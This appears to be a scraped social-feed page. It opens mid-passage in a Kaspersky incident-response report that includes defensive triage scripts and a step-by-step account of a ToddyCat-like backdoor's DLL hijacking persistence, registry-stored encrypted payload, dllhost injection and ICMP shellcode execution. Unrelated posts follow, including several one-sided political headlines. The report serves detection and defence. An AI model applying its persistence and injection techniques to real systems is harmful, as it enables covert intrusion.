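        elif op in ("New-InboxRule", "Set-InboxRule") and RULE_HIDING_PARAMS & set(p):
            target = p.get("From") or p.get("SubjectContainsWords") or "any message"
            alerts.append((when, user, f"inbox rule hides or diverts mail matching {target}"))
    return alerts


if __name__ == "__main__":
    for when, user, alert in triage(EVENTS):
        print(f"{when} {user}: {alert}")
```

The second sign-in, from inside the corporate range, produces no alert; the value of the rule is in the sequence, a new MFA method minutes after an unfamiliar sign-in, followed a month later by a SendAs grant and a rule that silences the bank, which is the chain the case describes.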

Mitre ATT&CK techniques
Tactic               | Technique used                                              | Technique ID | Details
Initial Access       | Phishing: Spearphishing Link                                | T1566.002    | Targeted attack against the customer domain from October 6, 2023
Persistence          | Account Manipulation: Device Registration                   | T1098.005    | Multiple authentication methods enabled for a compromised user
Credential Access    | Brute Force: Password Guessing                              | T1110.001    | Failed access on behalf of multiple users
Credential Access    | Brute Force: Password Spraying                              | T1110.003    | Attempted access using credentials confirmed as stolen by malware stealers
Privilege Escalation | Account Manipulation: Additional Email Delegate Permissions | T1098.002    | New permission configured to avoid detection and to access different mailboxes
Persistence          | Email Collection: Email Forwarding Rule                     | T1114.003    | New rules configured to evade detection and remain persistent

ToddyCat-like APT attack with an ICMP backdoor



Kaspersky’s Managed Detection and Response (MDR) service was alerted to suspicious activity on domain controllers and Exchange servers.

GERT was contacted to investigate the case; our analysis confirmed SMB abuse and IKEEXT service exploitation, as well as exploitation of the Microsoft Exchange server remote code execution vulnerability (CVE-2021-26855).

One interesting finding was the use of IKEEXT for persistence. The vulnerability used by the attackers, along with the exploit for it, was first published by High-Tech Bridge Security Research Lab in 2012. It was associated with the wlbsctrl.dll library and originally used for privilege escalation. Shortly after the exploit was published, Microsoft patched the vulnerability. However, our analysts confirmed that the same library is now being used as a persistence mechanism for malware.

IKEEXT is a default service on Windows. It is invoked by the svchost process, which loads ikeext.dll, the DLL responsible for the IKEEXT service.


The ikeext.dll library, in turn, is responsible for loading a DLL named wlbsctrl.dll; this is default Windows behavior. However, while the svchost service always runs on the system, wlbsctrl.dll does not exist in the file system by default, and this is where the threat actors saw an opportunity.


The threat actors created a malicious version of wlbsctrl.dll and saved it on the system. Because of this default Windows behavior, the DLL was loaded every time the service started, with no need for an Autorun entry, the registration mechanism more commonly used for persistence.


Besides persistence, in the investigated incident the threat actor used the IKEEXT vulnerability to perform lateral movement via the SMB protocol and created a custom firewall rule named DLL Surrogate that permits dllhost.exe to listen on custom port 52415. All this was achieved by placing the backdoored wlbsctrl.dll into the system32 folder where the legitimate library is normally stored (if present on the system).
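A host triage script for the two artifacts this case names, the unexpected wlbsctrl.dll in System32 and the firewall rule exposing dllhost.exe on port 52415, added here as an example (not code from the report). It reads the output of `netsh advfirewall firewall show rule name=all verbose`; the listing embedded below is a constructed sample in that layout, not a capture from the incident.

```python
"""Host triage for the IKEEXT persistence described above.

Added example, not code from the report. It checks the two artifacts the case
names: a wlbsctrl.dll present in System32 (absent on a default install) and an
inbound firewall rule letting dllhost.exe listen on port 52415. The netsh
listing is a constructed sample in the layout of
`netsh advfirewall firewall show rule name=all verbose`.
"""
import hashlib
import os
import re

# Constructed sample output (placeholder rules, not captured from the incident).
SAMPLE_NETSH_OUTPUT = r"""
Rule Name:                            DLL Surrogate
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            52415
RemotePort:                           Any
Edge traversal:                       No
Program:                              C:\Windows\System32\dllhost.exe
InterfaceTypes:                       Any
Security:                             NotRequired
Rule source:                          Local Setting
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             UDP
LocalPort:                            Any
RemotePort:                           53
Program:                              C:\Windows\System32\svchost.exe
Action:                               Allow
"""

# "Field name:   value" lines; separator lines and empty fields are skipped.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s+(\S.*)$")


def find_wlbsctrl(system32_dir):
    """Return (path, sha256) when wlbsctrl.dll exists under system32_dir, else None.
    The library is not shipped by default, so its presence alone deserves a look."""
    path = os.path.join(system32_dir, "wlbsctrl.dll")
    if not os.path.isfile(path):
        return None
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return path, digest.hexdigest()


def parse_netsh_rules(text):
    """Turn the netsh listing into a list of {field: value} dicts, one per rule."""
    rules, current = [], None
    for line in text.splitlines():
        match = FIELD_RE.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2).strip()
        if key == "Rule Name":
            current = {key: value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def suspicious_listener_rules(rules, program="dllhost.exe", port="52415",
                              rule_name="DLL Surrogate"):
    """Inbound Allow rules that expose `program` on `port`, or that carry the
    rule name seen in this case. Returns (rule, reason) pairs."""
    hits = []
    for rule in rules:
        reasons = []
        inbound_allow = rule.get("Direction") == "In" and rule.get("Action") == "Allow"
        exe = os.path.basename(rule.get("Program", "").replace("\\", "/")).lower()
        ports = {p.strip() for p in rule.get("LocalPort", "").split(",")}
        if inbound_allow and exe == program and port in ports:
            reasons.append(f"{program} allowed to listen on {port}")
        if rule.get("Rule Name") == rule_name:
            reasons.append(f"rule name matches '{rule_name}'")
        if reasons:
            hits.append((rule, "; ".join(reasons)))
    return hits


def triage_host(system32_dir, netsh_output):
    """Combine both checks into one report dict."""
    return {
        "wlbsctrl": find_wlbsctrl(system32_dir),
        "firewall": suspicious_listener_rules(parse_netsh_rules(netsh_output)),
    }


if __name__ == "__main__":
    print(triage_host(os.environ.get("SYSTEMROOT", "") + r"\System32", SAMPLE_NETSH_OUTPUT))
```

On a real host, feed it the live netsh output and the actual System32 path; a hit on either check is a lead for deeper analysis, not proof of compromise by itself, since a legitimately installed wlbsctrl.dll is possible on some systems.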

Later, the attacker implemented an ICMP backdoor. Once the backdoor was identified, Kaspersky verified and detected two more in-the-wild samples outside the customer’s infrastructure. All the discovered samples were similar except for the following points:

  • Some differences in the PE header (normal behavior between similar samples);
  • Different mutex strings, all located at the same raw file offset;
  • Different bytes at the raw file offset 0x452–0x483, which are apparently useless (non-actionable) code.

Based on GERT’s analysis, the backdoor acted like a loader, configured to execute the following activities:

  • Check for the mutex; if it already exists in memory, terminate the process.
  • Attempt to read the file %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; decrypt its contents with AES using a hardcoded key and a key derived from the volume serial number (VSN) of the C drive, use the result to set the value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, and then delete the file.
  • Load the contents of the default value of the registry key “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, decrypt it again with AES using the same key material, and invoke the payload shellcode.
  • Allocate the shellcode size in a new segment and jump to it.

Note: the calculated registry key name (Interface {<calculated_for_each_host>}) is derived from the VSN of the C drive; without the host’s VSN the payload cannot be decrypted correctly.


As part of the analysis, GERT identified a payload stored in the Windows registry and analyzed it, confirming the following behavior of the encrypted payload.

The decrypted payload starts with the header “CAFEBABE” (the magic bytes also used by Java class files), followed by the shellcode size and finally the data. This payload executes the following steps:

  1. Decrypt itself (for the third time);
  2. If not already running inside dllhost.exe, create a suspended dllhost process with the parameter “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, which refers to the COM+ System Application service;
  3. Allocate space in the new process;
  4. Write a section of the decrypted payload (starting at offset 0x1A03, with a size that is stored in the small header at offset 0x19FF) into the new allocation;
  5. Patch dllhost (in memory only) so that execution continues at the newly allocated space;
  6. Resume the dllhost process.

The new instance of the shellcode starts again from step one, finds that it is now running inside dllhost, decrypts a further section, executes it and listens on port 52415. The final payload injected into dllhost.exe appears to create a raw ICMP socket, which has no port. No outbound connection is made (although the received payload likely communicates outbound). Data is received from an unknown source as a Base64-encoded ICMP packet, converted to binary, decrypted, and executed directly: space is allocated with VirtualAlloc, the shellcode is copied into it, and execution is transferred to the allocation with a direct call.

According to our threat intelligence platforms, this threat has similarities to APT attacks: the tactics, techniques and procedures (TTPs) used are very similar to those of the ToddyCat actor, but there is no solid attribution to this group.

The objective of the threat actor was to gain persistence for monitoring and future impact, but no other objectives were confirmed based on the evidence obtained.

Mitre ATT&CK techniques
Tactic | Technique used | Technique ID
Resource Development | Develop Capabilities: Exploits | T1587.004
Resource Development | Develop Capabilities: Malware | T1587.001
Initial Access | Valid Accounts: Domain Accounts | T1078.002
Initial Access | Valid Accounts: Local Accounts | T1078.003
Execution | System Services: Service Execution | T1569.002
Execution | User Execution: Malicious File | T1204.002
Persistence | Create or Modify System Process: Windows Service | T1543.003
Persistence | Hijack Execution Flow: DLL Side-Loading | T1574.002
Persistence | Server Software Component: Web Shell | T1505.003
Persistence | Valid Accounts: Domain Accounts | T1078.002
Defense Evasion | Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002
Defense Evasion | Direct Volume Access | T1006
Defense Evasion | Modify Registry | T1112
Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004
Defense Evasion | Impair Defenses: Disable Windows Event Logging | T1562.002
Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001
Defense Evasion | Indicator Removal: File Deletion | T1070.004
Defense Evasion | Impair Defenses: Impair Command History Logging | T1562.003
Command and Control | Non-Application Layer Protocol | T1095

Conclusions


Although statistics show the government sector was the most targeted vertical last year, it is clear that threat and crimeware actors do not care which vertical their potential targets belong to. To stay ahead of the attackers, the best course of action is to assess your asset inventory and continue to monitor and protect it.

The trend of cyberattacks and intrusions making use of infrastructure assets or legitimate on-premises applications creates the need to enable additional layers of monitoring based on threat intelligence. The implementation of MDR has been one of the recurring triggers for new investigations thanks to its detection capabilities and the ability of analysts to determine timely courses of action.

To learn more about our Incident Response report, we invite you to view the recording of the webinar “Analyzing last year’s cyber incident cases”.


securelist.com/incident-respon…



Portable Multi-SDR Rig Keeps Your Radios Cool



With as cheap and versatile as RTL-SDR devices are, it’s a good idea to have a couple of them on hand for some rainy day hacking. In fact, depending on what signals you’re trying to sniff out of the air, you may need multiple interfaces anyway. Once you’ve amassed this arsenal of software defined radios, you may find yourself needing a way to transport and deploy them. Luckily, [Jay Doscher] has you covered.

His latest creation, the SDR SOLO, is a modular system for mounting RTL-SDRs. Each dongle is encased in its own 3D printed frame, which not only protects it, but makes it easy to attach to the base unit. To keep the notoriously toasty radios cool, each frame has been designed to maximize airflow. You can even mount a pair of 80 mm fans to the bottom of the stack to really get the air moving. The current design is based around the RTL-SDR Blog V4, but could easily be adapted to your dongle of choice.

In addition to the row of SDR dongles, the rig also includes a powered USB hub. Each radio connects to the hub via a short USB cable, which means that you’ll only need a single USB cable running back to your computer. There are also various mounts and adapters for attaching antennas to the system. Stick it all on the end of a tripod, and you’ve got a mobile radio monitoring system that’ll be the envy of the hackerspace.

As we’ve come to expect, [Jay] put a lot of thought and effort into the CAD side of this project. Largely made of 3D printed components, his projects often feature a rugged and professional look that really stands out.


hackaday.com/2024/09/03/portab…




Sid Meier and the history of the video game – obsessions and contaminations, by francesco mazzetta
ossessionicontaminazioni.com/2…



PODCAST. Emergency in Gaza. Stefano Sozza: “The worst of crises is here”


@Notizie dall'Italia e dal mondo
After months of waiting for the humanitarian permit, the Italian NGO has entered Gaza to provide basic healthcare to a population ravaged by the war. We interviewed head of mission Stefano Sozza
The article PODCAST. Emergency in Gaza. Stefano Sozza:




New version 0.1.0-alpha18 released! This is mainly a bugfix release, containing layout improvements, display of a blurred version of images while they load, propagation of post/user update events between screens, the ability to add a new account directly from the account management bottom sheet, a distinction between editable and predefined circles, plus a new screen with information about the current instance (reachable from the side menu). In the coming days: handling of direct messages (a Friendica-specific feature). #friendica #friendicadev #androidapp #androiddev #fediverseapp #opensource #kotlin #kmp #compose #livefasteattrash




Litigation funds: the dangerous ties between finance and justice


@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
In recent years litigation funds have taken hold: they advance the costs of class actions and, in case of success, keep part of the payouts
The article Litigation funds: the dangerous ties between finance and justice originally appeared on Valori.

valori.it/litigation-funds/



Mélenchon’s party confirms motion to remove Macron from office • Imola Oggi
imolaoggi.it/2024/08/27/partit…



Today we are working on the final drafts of the English-language Handbook that we are preparing with Milano University Press for the course “smart cities, artificial intelligence and digital transformation law” at the University of Milan, which will start at the end…




Search for Unrwa on Google and you end up… on sites paid for by the Tel Aviv government
pillole.graffio.org/pillole/ce…



Elly, please, forget about Renzi in Liguria and give the centre-left its line for the Region


@Politica interna, europea e internazionale
This is an appeal, indeed a pressing request, an anguished plea addressed to the national and local leaders of the parties of the so-called opposition, and in particular to the Partito Democratico. In particular I address the secretary, Elly Schlein



Palestinians denounce: serious conditions of MP Khalida Jarrar in prison in Israel


@Notizie dall'Italia e dal mondo
The Popular Front parliamentarian, detained without trial for eight months, is reportedly being held in strict isolation and subjected to severe restrictions despite her precarious health
The article



Deca – Strategia esoterica


“Each new work of mine represents the sum and synthesis of all those made before it, once again evolving their meaning and artistic scope. I believe that “Strategia Esoterica” nonetheless has a far greater strength because it is the fruit of a very powerful transmutation” - Deca @Musica Agorà

iyezine.com/deca-strategia-eso…



The organization that runs National Novel Writing Month, a November challenge to write 50,000 words, said "the categorical condemnation of Artificial Intelligence has classist and ableist undertones."#News #AI #nanowrimo


BOOKS. Palestine Laboratory: field experience is sold as weapons


@Notizie dall'Italia e dal mondo
Antony Loewenstein, an Australian investigative journalist, traces the line of relations between the Israeli arms industry and many countries of the world. Arms sales emerge as a pressing priority for Tel Aviv regardless of the political nature of the buyer
The article




GAZA. Israel builds a new corridor for permanent control


@Notizie dall'Italia e dal mondo
Begun in early November, according to Forensic Architecture, the construction of the road has cost the destruction of farms, agricultural land, homes and orchards, and will guarantee troops secure access right into Gaza City
The article GAZA. Israel



#NotiziePerLaScuola
The new issue of the newsletter of the Ministry of Education and Merit is available.


Pibiesse, the print shop that looks to the future


@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
Pibiesse is a print shop, but also a social innovation project that aims to become a model for the regeneration of the area
The article Pibiesse, the print shop that looks to the future originally appeared on Valori.

valori.it/pibiesse-storie-dal-…



Planes and ships in the European taxonomy: Brussels will have to answer for it in court


@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
Brussels labels polluting planes and ships as “green investments”: a coalition of NGOs drags it to court
The article Planes and ships in the European taxonomy: Brussels will have to answer for it in court originally appeared on Valori.



Ukraine is being destroyed - but no one in the West wants to take responsibility for it - American professor
controinformazione.info/lucrai…


Bluesky experiences a massive new wave of signups from Brazil, Premium feeds with sub.club, and much more.
Last Week in Fediverse – ep 82, by Laurens Hof (fediversereport.com/last-week-in-fediverse-ep-82/, posted 2024-09-01)

1 million new accounts on Bluesky as Brazil bans X, and premium feeds with Sub.club, and much much more.

Brazil bans X, and a signup wave to Bluesky


The Brazilian supreme court has banned the use of X in an ongoing legal fight with Elon Musk. The ban follows after a long trajectory of legal issues between the Brazilian government and Musk’s X. In April 2024, the Brazilian court ordered X to block certain X accounts that were allegedly related to the 2023 coup attempt, which Musk refused to do. In that same time period, President Luiz Inácio Lula da Silva opened an account on Bluesky, and there was already an inflow of a Brazilian community into Bluesky. Now, the legal fight has further escalated over X’s refusal to appoint a legal representative in the country, and Musk’s continuing refusal to comply with Brazil’s laws and regulation has resulted in the supreme court banning the use of X in the country altogether.

The ban on X has caused a massive signup wave to Bluesky, with over 1 million new accounts created in just three days, of which the large majority are from Brazil. The user statistics shot up even more than that, suggesting that there are a lot of people with an existing account logging back in as well.

The new inflow of people to Bluesky is having some significant effects on the network, as well as on the state of decentralised social networks more broadly:

  • President Lula is putting actual focus on Bluesky. In one of his final posts on X, Lula listed in non-alphabetical order all other platforms that he is active on, and placed Bluesky at the top of the list. Posts by Lula that are placed on Bluesky (134k followers) as well as on Threads (2.4m followers) get more than 5 times as many likes on Bluesky. Today, Lula explicitly asked people on Bluesky what they thought about the platform, in a post that got over 30k likes and counting. It is hard to imagine that the Brazilian government is not paying attention to all this, and is looking at which platform(s) the Brazilian community is moving towards in the wake of the ban on X.
  • Brazilians are a very active community on the internet (see Orkut), and bring with them their own unique culture to Bluesky. The current decentralised social networks are heavily focused on US politics, judged by top posts on both Mastodon and Bluesky, and beyond shitposts and memes there is surprisingly little space for mainstream pop culture and sports. The Brazilian community does seem to bring a large amount of pop culture and sports to Bluesky, significantly diversifying the topics of discussion, and in turn, creating more space for other people who are interested in that in the future. The activity of Brazilians on microblogging can also be seen in the like counts on popular posts of Bluesky: before this week, the most popular posts of any given day usually got around 3k likes; this has sprung up to 30k to 50k likes. Brazilians are so chatty in fact, that currently 81% of the posts on the network are in Portuguese, and the number of accounts of people who post on a given day has gone up from a third to over 50%.
  • The Bluesky engineers have built a very robust infrastructure system, and the platform has largely cruised along fine without issues, even when faced with a 15x increase in traffic. This all without having to add any new servers. For third party developers, such as the Skyfeed developer, this increase in traffic did come with downtime and more hardware requirements however. It shows the complications of engineering an open system: while the Bluesky team itself was prepared with their core infrastructure, third party infrastructure, on which a large number of custom feeds rely, was significantly less prepared for the massive increase in traffic.

In contrast, the ban on X in Brazil has made little impact on Mastodon, with 3.5k new signups from Brazil on Mastodon.social. I’d estimate that this week has seen 10k new accounts above average, with 15k new accounts the previous week and 25k in this week. That places Mastodon two orders of magnitude behind Bluesky in signups from Brazil. There are a variety of reasons for this, which deserve their own analysis; this newsletter is long enough as it is. One thing I do want to point out is that within the fediverse community there are two sub-communities that each have their own goals and ideas about the fediverse and growth. Some people responded to the news that most Brazilians went to Bluesky with a type of response that indicated that they appreciate the small, quiet and cozy community that the fediverse currently provides, and a distrust of the growth-at-all-costs model for social networks. For other people however, their goal for the fediverse is to build a global network that everyone is a part of and everyone uses (‘Big Fedi’), a view of the fediverse that is also represented in the latest episode of the Waveform podcast (see news below). And if the goal is to build ActivityPub into the default protocol for the social web, it is worth paying attention to what is happening right now in the Brazilian ATmosphere.

The News


Sub.club is a new way to monetise feeds on the fediverse, with the goal of bringing the creator economy to the fediverse. It gives people the ability to create premium feeds that people can only access via a subscription. People can follow this feed from any Mastodon account (work on other fediverse platforms is ongoing). Sub.club handles the payment processes and infrastructure, for which they charge 6% of the subscription fee (compared to the 8-12% Patreon charges). Sub.club also makes it possible for other apps to integrate; both IceCubes and Mammoth have this option. Bart Decrem, who is one of the people behind Sub.club, is also the co-founder of the Mastodon app Mammoth. Sub.club also explicitly positions itself as a way for server admins to fund their server. Most server admins rely on donations by their users, often via services like Patreon, Ko-fi, Open Collective or other third party options. By integrating payments directly into the fediverse, Sub.club hopes that the barrier for donations will be lower, and more server admins can be financially sustainable.

Newsmast has built a new version of groups software for the fediverse, and the first group is dedicated to the Harris campaign. There are a few types of groups available that integrate with Mastodon, such as with Friendica or a.gup.pe. These groups function virtually identically to hashtags, by boosting out posts where the group account is tagged to everyone who follows the group account. As there is no moderation in these types of group accounts, it allows anyone to hijack the group account. A group account dedicated to a political campaign is especially vulnerable to this. On Mastodon a volunteer Harris Campaign group used a Friendica group for campaign organising, but the limited moderation tools (blocking a user from following the group) that are available are not working, which allowed blocked users to still get their posts boosted by the group account. Newsmast’s version of Groups gives (working) moderation tools, and only boosts top level comments and not replies, to cut down on the noise. For now, the new Group is only available to the Harris Campaign group for testing, but it will come later to Mastodon servers that run the upcoming Patchwork plugin.

Bluesky added quite a number of new anti-toxicity features in their most recent app update. Bluesky has added quote posting controls, allowing people to set on a per-post basis if people can quote the post or not. There is also the option to remove quotes after the fact as well: if you’ve allowed quote posts on a post you’ve made, but someone made a quote post that you do not feel comfortable with, you have the possibility to detach your post. Another update is the possibility to hide replies on your posts. Bluesky already hides comments under a ‘show more’ button if the comment is labeled by a labeler you subscribe to. You now have the option to do so on all comments that are made on your posts, and the hidden comment will be hidden for everyone. Finally, Bluesky has changed how replies are shown in the Following feed, which is an active subject of discussion. I appreciate the comments made by Bluesky engineer Dan Abramov here, who notes there are two different ways of using Bluesky, which each prioritise comments in conflicting ways. As new communities grow on Bluesky, prioritising their (conflicting) needs becomes more difficult, and I’m curious to see how this further plays out.

The WVFRM (Waveform) podcast of popular tech YouTuber MKBHD has a special show about the fediverse, ‘Protocol Wars – The Fediverse Explained!’. It is partially a discussion podcast, partially an explainer, and partially an interview with many people within the community. They talk with Mastodon’s Eugen Rochko, Bluesky’s Jay Graber, Threads’s Adam Mosseri, and quite some more people. It is worth noting for a variety of reasons. The show is quite a good introduction that talks to many of the most relevant names within the community. MKBHD is one of the biggest names in the tech creator scene, and many people are paying attention to what he and his team are talking about. Furthermore, I found the framing as ‘protocol wars’ interesting, as the popularity of Bluesky in Brazil as an X replacement indicates that there is indeed a race between platforms to be built on top of the new dominant protocol.

Darnell Clayton has a very interesting blog post, in which he discovers that there is a discrepancy in follower count for Threads accounts that have turned on fediverse sharing. Clayton notes that the follower count shown in the Threads app is lower than the one shown in a fediverse client, for both Mastodon and Flipboard. He speculates that this difference is the number of fediverse accounts that follow a Threads account. It should be noted that this is speculation and has not been confirmed, but if this is true, it would give us a helpful indication of how many fediverse accounts are using the connection with Threads. While we’re talking about Threads accounts, Mastodon CEO Eugen Rochko confirmed that the mastodon.social server has made a connection with 15.269 Threads accounts who have turned on fediverse sharing.

The Links


That’s all for this week, thanks for reading.

#fediverse

fediversereport.com/last-week-…



Yesterday I had planned a tour of bike shops to see and try a few e-bikes. One of them is in Spandau, which compared to my place is in the middle of nowhere (at least an hour’s journey), so I combined business with pleasure and took the opportunity to visit the Citadel as well.


View from the Juliusturm (1230), said to be the oldest preserved building in Berlin.

This choice first of all introduced me to Heilung, a band that pounds really hard and was playing that very evening right in the Citadel. The technicians doing their soundcheck while I wandered around made me appreciate them. If you love music that pounds really hard, give them a listen; I think they can bring together people with different tastes (as long as they pound! Did I mention they poundpoundpound?).

Then it must be said that the entrance ticket, a measly €4.50, gives access to all six museums in the complex, small and varied, but all worth seeing. I only skipped the Centre for Contemporary Art because it was closed for the setup of an exhibition.

First stop: the “archaeological window”

Here the archaeological excavations are preserved that brought to light the three construction phases of the fortification. From the 13th to the 16th century you can see the evolution from the first wooden palisade, to the medieval stone walls, to the Renaissance-style red-brick castle visible today. Engineering details are also explained, such as how, to build the massive bastions as they are today, they “spilled” beyond the boundaries of the little island on which the original core had stood. To build in the water they basically made a dense base of wooden “teeth” on which the current structure was then built. That it all didn’t sink seems miraculous to me.

Second stop: the Spandau municipal museum

Here artefacts from Spandau’s history are displayed: from replicas of official documents, to everyday objects, to the products of the industry historically based here, to (of course) National Socialism, to the division.


These are toys, which in itself makes me shudder. On the figurines of Hitler and Göring you can raise the little arm to make them give the Nazi salute. It has a dystopian flavour, yet it really happened: children played with this stuff.

Wandering around here I discovered that part of Metropolis was shot in Spandau (I only thought of the Babelsberg studios, but no) and there is a memoir by someone who took part in the production that I will want to read in full. I love Metropolis!

Third stop: the armoury (or however the hell we want to translate Exerzierhalle)

Cannons are kept here. Dozens and dozens of cannons. The oldest is from the early 1400s, the youngest dates from the First World War.


Imagine crouching back here shooting at the “enemy”.

The hall is closed and, in the heat, a smell lingers inside that recalls a mechanic’s workshop, but with a “twist” all its own. My brain labelled it “the smell of war”, but I don’t think the stink on the battlefield was that (or at least not only that).
Poking around (because here you are allowed to put your hands on the artefacts) I then noticed that there was a period, between the 1600s and 1700s, when it was customary to put various mottoes on cannons. This one struck me the most:


It says: “Saturnus frist (!) die Kind allein ich fress sie aller gros (!) und klein” (roughly: “Saturn eats only children, I eat everyone, big and small”. Which, coming from a cannon, fits).

Fourth stop: the provisions depot

This is a Renaissance-period building, partly rebuilt, today used as a gallery that preserves a series of sculptural monuments from the 18th to the 20th century previously scattered around Berlin. Basically a gathering of figures relevant to the history of the city (and not only). At the end there’s him too: Lenin’s big head!


You know Hitler’s mega-project to transform Berlin into the “Welthauptstadt Germania”? How it was supposed to become a monumental city, with a hyper-mega celebratory building at its centre? Well. This model gives an idea of how megalomaniac the design of that building was: that little thing on the right is the Brandenburg Gate, to scale.

Fifth stop: the commandant’s house

I saw it last, but, since it is above the ticket office, you could actually see it first. Here artefacts and documents from the history of the Citadel are kept, further details on the construction phases, but also the local flora and fauna.

What to say at the end of all this? Nothing really, just that every time I brush against the history of this city, a shiver down the spine is guaranteed. Crazy things happened here.

(Oh, I did try the bikes in all this. I have two candidates to choose between.)

#MuseiDaVedere #Berlino #Spandau



TRAFFICO UMANO PER LA RIMOZIONE DI ORGANI. UNA PIAGA GLOBALE


Immagine/foto
Human trafficking for organ removal is a form of exploitation in which the victims, often vulnerable, are deceived or coerced into donating organs. The victims are frequently exploited, and their "consent" is invalid because of deception or abuse of their vulnerability.
Demand is driven by the global shortage of organs for ethical transplants. With less than 10% of global demand met, many desperate patients turn to illegal means. This creates a lucrative market for organ trafficking, estimated at between 840 million and 1.7 billion dollars a year.
Kidneys and parts of the liver are the organs most frequently removed.
Organ traffickers operate within complex, organized global networks that require a sophisticated infrastructure involving medical specialists and logistical coordination. They use local advertisements, social media, and direct approaches by recruiters, who are often former victims or trusted people in the community. These networks are flexible and can function as mobile units or specialized groups.
The typical victims of trafficking for organ removal come from poor, uneducated, and vulnerable backgrounds. Organized criminal groups specifically target the unemployed, migrants, asylum seekers, and refugees. Many of them are coerced or deceived, or see selling an organ as a last resort to improve their situation.
The consequences for victims include serious health problems.
UNODC, the United Nations Office on Drugs and Crime, a UN agency founded in 1997 and headquartered in Vienna, is working to improve the legal and justice responses to this crime. It has done so also through a series of publications (unodc.org/unodc/en/human-traff…), among which the one of greatest interest for international police cooperation is the Toolkit on the Investigation and Prosecution of Trafficking in Persons for Organ Removal (unodc.org/res/human-traffickin…)
According to the Declaration of Istanbul on Organ Trafficking and Transplant Tourism (declarationofistanbul.org/imag…), the key definitions relating to organ trafficking include:

1. Organ trafficking: illicit activities involving the removal and trade of human organs, often through coercion or deception.
2. Transplant tourism: travel by patients to countries where transplant laws are less strict, in order to receive organs in an unethical way.
3. Transplant commercialism: the practice of financially compensating organ donors, in violation of the principles of voluntary and unpaid donation.

These definitions are meant to guide policy and practice in the field of organ donation and transplantation.
The main purpose of organ trafficking, according to the United Nations Protocol, is the exploitation of vulnerable donors for the financial profit derived from the illegal removal and transplantation of organs. This crime is considered a form of exploitation and a human rights violation, aimed at taking advantage of people in situations of vulnerability. The Protocol aims to prevent and punish such practices while protecting the rights of victims.
The legal consequences for people involved in organ trafficking can include prison sentences for offenses such as the illegal removal of organs, the solicitation of donors or recipients, and the offering of undue advantages to health officials. They can also be prosecuted for complicity, attempted trafficking, and advertising organs for profit. Penalties vary according to national legislation, but can also involve significant fines and the confiscation of illicitly obtained assets.
States can hold recipients of trafficked organs liable under national legislation implementing the Convention against Trafficking in Persons, which provides for the liability of those who use the services of a trafficking victim while knowing of their condition. States are also obliged to criminalize participation in and organization of acts of organ trafficking, extending liability to legal persons as well. However, the decision to prosecute organ recipients is complex, since they are often in desperate situations.

#UNODC #TRAFFICODIORGANI



Review: MELT-BANANA – 3 + 5


"What the fuck is this stuff?!?!?!?" wondered, amazed, the one writing to you, on discovering years ago the existence of the Japanese Melt-Banana, since 1992 among the principal agitators of the conceptual "Japanoise" scene/movement, that is, genuine sonic terrorists, from Tokyo with fury, purveyors of a schizophrenic sound built on hyperkinetic hardcore, noise rock, and scraps of electronic music inspired by video games, anime, and manga comics. @Musica Agorà iyezine.com/melt-banana-3-5


.... And after the XEC variant will come the Pdor variant, son of Kmer, of the tribe of Istar, from the desolate land of Xmir...



Burkina Faso has decided to nationalize its gold mines | L'Indipendente

"The action of the government in Ouagadougou is part of a broader context, in which more and more African nations are reclaiming their own resources in order to direct the profits toward national development rather than foreign companies. The trend is even more marked in those African states eager to regain their political and strategic independence from Western neocolonial directives."

lindipendente.online/2024/08/3…



@RaccoonForFriendica new version 0.1.0-alpha15 released, which includes editing of profile data (unfortunately only partial, because so far the Friendica endpoint doesn't allow updating all the fields), display of images' alt text, the ability to share user profile URLs, and a series of fixes in the loading of lists (a.k.a. "circles") and of groups in forum mode. We're getting close to a beta version; I'll take the opportunity to also thank N7-X, who contributed to the display of the bottom sheets. Have a good weekend, folks! #friendica #friendicadev #androidapp #androiddev #kotlin #kmp #compose #opensource #fediverseapp #livefasteattrash


in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻‍💻🍕

Never mind, it's probably better to use alpha16, where I made some last-minute layout fixes. Now I'm really logging off, have a good weekend!


in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻‍💻🍕

And since there's no two without three: alpha17, because there were bugs in the handling of follow requests, and user search could be optimized.




Russia: F-16 fighters, the first Ukrainian fiasco and Moscow's irony - Tatiana Santi - Il Vaso di Pandora
ivdp.it/articoli/caccia-f16-il…


USA: globalism has failed in the eyes of the average American - Gabriele Sannino - Il Vaso di Pandora
ivdp.it/articoli/l-globalismo-…